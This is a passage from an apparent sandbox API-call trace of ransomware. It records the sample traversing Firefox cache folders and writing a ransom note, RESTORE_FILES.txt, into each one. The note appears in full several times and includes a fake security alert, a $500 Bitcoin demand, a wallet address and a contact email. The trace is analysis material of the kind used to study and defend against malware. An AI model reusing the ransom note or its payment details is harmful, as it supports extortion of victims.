HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\5\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.200] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.200] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.201] lstrlenA 
(lpString="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") returned 684 [0086.201] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.201] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.201] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.201] CloseHandle (hObject=0x158) returned 1 [0086.201] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.201] lstrcmpiW (lpString1="6", lpString2="Windows") returned -1 [0086.201] lstrcmpiW (lpString1="6", lpString2="Program Files") returned -1 [0086.201] lstrcmpiW (lpString1="6", lpString2="Program Files (x86)") returned -1 [0086.202] lstrcmpiW (lpString1="6", lpString2="$Recycle.bin") returned 1 [0086.202] lstrcmpiW (lpString1="6", lpString2="System Volume Information") returned -1 [0086.202] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned 97 [0086.202] lstrcmpW (lpString1="6", lpString2=".") returned 1 [0086.202] lstrcmpW (lpString1="6", lpString2="..") returned 1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\*") returned 99 [0086.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.202] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.202] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.202] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\.") returned 99 [0086.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.202] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.202] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.202] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.202] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.202] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.202] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\..") returned 100 [0086.202] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.202] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.202] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.202] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.202] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\RESTORE_FILES.txt") returned 115 [0086.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\6\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.203] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.203] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.204] lstrlenA (lpString="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") returned 684 [0086.204] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.204] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.204] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.204] CloseHandle (hObject=0x158) returned 1 [0086.204] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.204] lstrcmpiW (lpString1="7", lpString2="Windows") returned -1 [0086.204] lstrcmpiW (lpString1="7", lpString2="Program Files") returned -1 [0086.204] lstrcmpiW (lpString1="7", lpString2="Program Files (x86)") returned -1 [0086.204] lstrcmpiW (lpString1="7", lpString2="$Recycle.bin") returned 1 [0086.204] lstrcmpiW (lpString1="7", lpString2="System Volume Information") returned -1 [0086.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned 97 [0086.204] lstrcmpW (lpString1="7", lpString2=".") returned 1 [0086.204] lstrcmpW (lpString1="7", lpString2="..") returned 1 [0086.204] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\*") returned 99 [0086.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.205] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.205] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.205] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.205] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\.") returned 99 
[0086.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.206] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.206] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.206] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.206] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.206] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.206] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.206] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\..") returned 100 [0086.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.206] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.206] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.206] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\RESTORE_FILES.txt") returned 115 [0086.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\7\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.206] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.207] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.207] lstrlenA (lpString="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") returned 684 [0086.207] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.207] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.208] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.208] CloseHandle (hObject=0x158) returned 1 [0086.208] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.208] lstrcmpiW (lpString1="8", lpString2="Windows") returned -1 [0086.208] lstrcmpiW (lpString1="8", lpString2="Program Files") returned -1 [0086.208] lstrcmpiW (lpString1="8", lpString2="Program Files (x86)") returned -1 [0086.208] lstrcmpiW (lpString1="8", lpString2="$Recycle.bin") returned 1 [0086.208] lstrcmpiW (lpString1="8", lpString2="System Volume Information") returned -1 [0086.208] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned 97 [0086.208] lstrcmpW (lpString1="8", lpString2=".") returned 1 [0086.208] lstrcmpW (lpString1="8", lpString2="..") returned 1 [0086.208] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\*") returned 99 [0086.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.208] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.208] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\.") returned 99 [0086.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.208] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.208] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.209] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\..") returned 100 [0086.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.209] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.209] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.209] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\RESTORE_FILES.txt") returned 115 [0086.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\8\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.210] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.210] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.210] lstrlenA 
(lpString="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") returned 684 [0086.210] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.211] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.211] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.211] CloseHandle (hObject=0x158) returned 1 [0086.211] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.211] lstrcmpiW (lpString1="9", lpString2="Windows") returned -1 [0086.211] lstrcmpiW (lpString1="9", lpString2="Program Files") returned -1 [0086.211] lstrcmpiW (lpString1="9", lpString2="Program Files (x86)") returned -1 [0086.211] lstrcmpiW (lpString1="9", lpString2="$Recycle.bin") returned 1 [0086.211] lstrcmpiW (lpString1="9", lpString2="System Volume Information") returned -1 [0086.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned 97 [0086.211] lstrcmpW (lpString1="9", lpString2=".") returned 1 [0086.211] lstrcmpW (lpString1="9", lpString2="..") returned 1 [0086.211] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\*") returned 99 [0086.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.212] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\.") returned 99 [0086.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.213] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\..") returned 100 [0086.213] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.213] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.213] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.213] lstrcmpiW (lpString1="10", lpString2="Windows") returned -1 [0086.213] lstrcmpiW (lpString1="10", lpString2="Program Files") returned -1 [0086.213] lstrcmpiW 
(lpString1="10", lpString2="Program Files (x86)") returned -1 [0086.213] lstrcmpiW (lpString1="10", lpString2="$Recycle.bin") returned 1 [0086.213] lstrcmpiW (lpString1="10", lpString2="System Volume Information") returned -1 [0086.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned 100 [0086.213] lstrcmpW (lpString1="10", lpString2=".") returned 1 [0086.213] lstrcmpW (lpString1="10", lpString2="..") returned 1 [0086.214] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\*") returned 102 [0086.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.214] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.214] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.214] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.214] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.214] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.214] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\.") returned 102 [0086.214] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.214] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.215] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.215] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.215] 
